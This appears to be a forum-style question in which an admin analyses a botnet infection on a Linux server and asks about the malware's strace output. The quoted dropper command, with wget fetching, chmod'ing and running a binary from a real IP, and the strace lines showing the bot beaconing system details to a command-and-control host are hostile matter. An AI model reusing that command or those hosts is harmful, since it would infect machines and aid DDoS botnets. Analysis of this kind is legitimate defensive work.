networking - strace calls of a possible botnet file -
i found out there unknown process running on 1 server, digged in bit discover files belong botnet. process part of ddos, using cpu @ 100%.
files found were: - /tmp/cool
- /tmp/cpubalence
the malicious files replacing /usr/bin/passwd
exec run /bin/sh echo '0' > /proc/sys/vm/dirty_writeback_centisecs;/bin/sh -c 'wget -p /tmp/ http://69.12.92.196:911/wa -o /tmp/cool;chmod 777 /tmp/cool;/tmp/cool > /dev/null &'
on vm, tried using strace on having following output i'd understand more.
due curiosity, emulate network messages see what's response.
open("zconf.n", o_rdonly) = -1 enoent (no such file or directory) getgid32() = 0 open("amp.lst", o_rdonly) = -1 enoent (no such file or directory) mmap2(null, 8392704, prot_read|prot_write, map_private|map_anonymous|map_stack, -1, 0) = 0xfffffffff6fe1000 mprotect(0xf6fe1000, 4096, prot_none) = 0 clone(child_stack=0xf77e1304, flags=clone_vm|clone_fs|clone_files|clone_sighand|clone_thread|clone_sysvsem|clone_settls|clone_parent_settid|clone_child_cleartid, parent_tidptr=0xf77e1bd8, tls=0xf77e1bd8, child_tidptr=0xff938810) = 3848 close(4294967295) = -1 ebadf (bad file descriptor) socket(pf_inet, sock_stream, ipproto_ip) = 3 fcntl64(3, f_getfl) = 0x2 (flags o_rdwr) fcntl64(3, f_setfl, o_rdwr|o_nonblock) = 0 connect(3, {sa_family=af_inet, sin_port=htons(84), sin_addr=inet_addr("104.129.62.170")}, 16) = -1 einprogress (operation in progress) select(4, null, [3], null, {30, 0}) = 1 (out [3], left {29, 818828}) getsockopt(3, sol_socket, so_error, [0], [4]) = 0 fcntl64(3, f_getfl) = 0x802 (flags o_rdwr|o_nonblock) fcntl64(3, f_setfl, o_rdwr) = 0 send(3, "linux 3.2.0-4-amd64\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0001*2392mhz\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\000680mb\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(null)\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0000\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0000\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0zeroteam\0\0\0\0\0\0\0\0\0\0\0\0", 228, 0) = 228 setsockopt(3, sol_socket, so_keepalive, [1], 4) = 0 setsockopt(3, sol_tcp, tcp_keepidle, [300], 4) = 0 setsockopt(3, sol_tcp, tcp_keepintvl, [60], 4) = 0 setsockopt(3, sol_tcp, tcp_keepcnt, [2], 4) = 0
Comments
Post a Comment